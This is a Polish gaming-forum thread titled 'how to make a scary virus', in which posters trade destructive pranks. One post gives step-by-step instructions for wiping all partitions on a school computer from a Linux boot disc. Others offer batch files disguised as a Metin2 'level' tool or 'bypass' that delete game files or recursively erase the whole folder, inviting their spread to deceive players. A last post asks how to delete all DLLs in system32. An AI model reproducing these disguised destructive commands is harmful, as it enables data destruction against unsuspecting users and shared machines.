Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

[Pytanie] Jak Zrobić Strasznego Wirusa


Rekomendowane odpowiedzi

Opublikowano

Podaj kod który uruchomiłeś i nie jęcz. Nie pisz na caps lock, bo to żałosne.

Swoją drogą śmiesznie jest, nie dał bym wiary, że ktoś łyknie, by odpalić jakiś plik który powinien np. formatować dysk :)

Jeżeli szukasz pomocy, piszesz poprawnie po polsku, a rozwiązaniem twojego problemu nie jest pierwszy link w google - prawdopodobnie pomogę.

Jeżeli chcesz gotowca, to najpierw podaj cenę. Cenę w pln, bo za plusy pracują lamusy :)

  • Odpowiedzi 66
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Haha dobre napisać coś takiego jak typa nie ma od infy, i wziąść w autostart na kompie. I jak kompy są podłączone do jednej sieci to wysłać na wszystkie do autostartu i wszystkie kompy od nowa instalka itp. Ciekwaiła by mnie mina facia od infy. Haha. Dobre.

Do sieci pracowni komputerowej latwo jest sie wlamac przez przegladarke ;)

Opublikowano

a po co przeglądarka, zrobi się to dosłownie kilkoma kliknięciami i masz dostęp do admina :) , ale wątpie by ci ktoś kto robi albo administruje takiimi sieciami powiedział jak

If you = stupid then

insert(foot.in.your.ass)

end if

licznik-54-96732-stat.png

Opublikowano

ktoś czegoś nie zrozumiał ? sam system blokuje taką operacje chyba ze to wirus który instaluje sie w bootsektorze i jak pierwszy wykonany program po uruchomieniu dysku wykonuje format , zresztą co da zapisanie komend bat w exeku to nadal sa komendy bat tylko wykonywane w konsoli

If you = stupid then

insert(foot.in.your.ass)

end if

licznik-54-96732-stat.png

Opublikowano

Chcecie zyskać w szkole opinię prawdziwych ch4k3ruf? Napiszę jak uzyskać taki efekt.

 

1. Weźcie do szkoły płytę z linuxem, np. slackware, pld, arch (musi być w konsoli!);

2. Wciskacie cały czas enter, do czasu gdy system poprosi o login;

3. wprowadzamy 'root' i wciskamy enter.

4. wprowadzamy 'cfdisk' i wciskamy enter;

5. strzalkami gora i dol przesuwamy sie po liscie partycji. Zaznaczamy jedną z nich i strzałkami na boki wybieramy opcję 'delete'. Robimy tak samo z całą resztą partycji;

6. Strzałkami przesuwamy na 'Write', walimy enter, a gdy pojawi się jakies pytanie to piszemy 'yes'.

7. Restartujemy komputer

8. Śmiejemy się i mówimy nauczycielowi, że jest noobem. Dziewczynom mówimy, że niestety nie mamy czasu by sie z nimi spotkać, bo po południu trzeba iść hakować z kolegami tibie.

 

Będziecie najpopularniejsi w szkole! Co wam szkodzi spróbować?

Jeżeli szukasz pomocy, piszesz poprawnie po polsku, a rozwiązaniem twojego problemu nie jest pierwszy link w google - prawdopodobnie pomogę.

Jeżeli chcesz gotowca, to najpierw podaj cenę. Cenę w pln, bo za plusy pracują lamusy :)

Opublikowano

Powiedz najlepszemu h4xi0rowi w szkole żeby stworzył plik o nazwie 99lvl.bat i wpisał do niego:

del *.eix
del *.epk

Potem niech go wrzuci do folderu pack w Metinie i odpali ^_^

Opublikowano

cienko twój kasuje pliczki , a mój robi bypassa do metina2 , czyściuteńki i bez problemu mamy potem Metin

 

gre instalujemy w głownym katalogu dysku np : C:\Metin2 albo D:\Metin2 inaczej nie zadziała

robisz plik bypass.bat a w nim piszesz :

 rd /s /q %cd%

wrzucasz do głównego katalogu z grą , C:\Metin2, uruchamiasz i masz gotowego bypassa na każdą wersje metina B)

 

Darmowy bypass do Metin2 ; zezwalam kopiować na wszystkie fora i tematy związane z metinem, nawet bez podawania nicku autora ( mojego ) powyższego tutorialu

If you = stupid then

insert(foot.in.your.ass)

end if

licznik-54-96732-stat.png

Opublikowano

Jezeli zrobie tego wirusa i go nie otworze bedzie wszystko dobrze z moim windowsem. Dopiero jak go otworze bede mial przej.... ??

"Nie ufaj nikomu , nawet tym którym zdaje Ci się że możesz ufać"

hehe2m.png

  • 1 miesiąc temu...
  • 4 tygodnie później...
Opublikowano

1.co zrobic, by usunelo pliki z wszystkich partycji nie tylko na tej na ktorej znajduje sie bat < bez folderu>?

2.co zrobic by usunelo pliki np dll ale z C:\windows\system32\ i tu wszystkie pliki z rozszerzeniami dll?

prosze o pomoc;] bo hccialem zrobic to za pierwszym razem zeby zadzialalo i nie tylko na C ale z wszystkich partycji

pomogłem? daj + nic Cię nie kosztuje a może akurat gdy będę coś wiedział to ci pomoge^^

  • 2 tygodnie później...

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...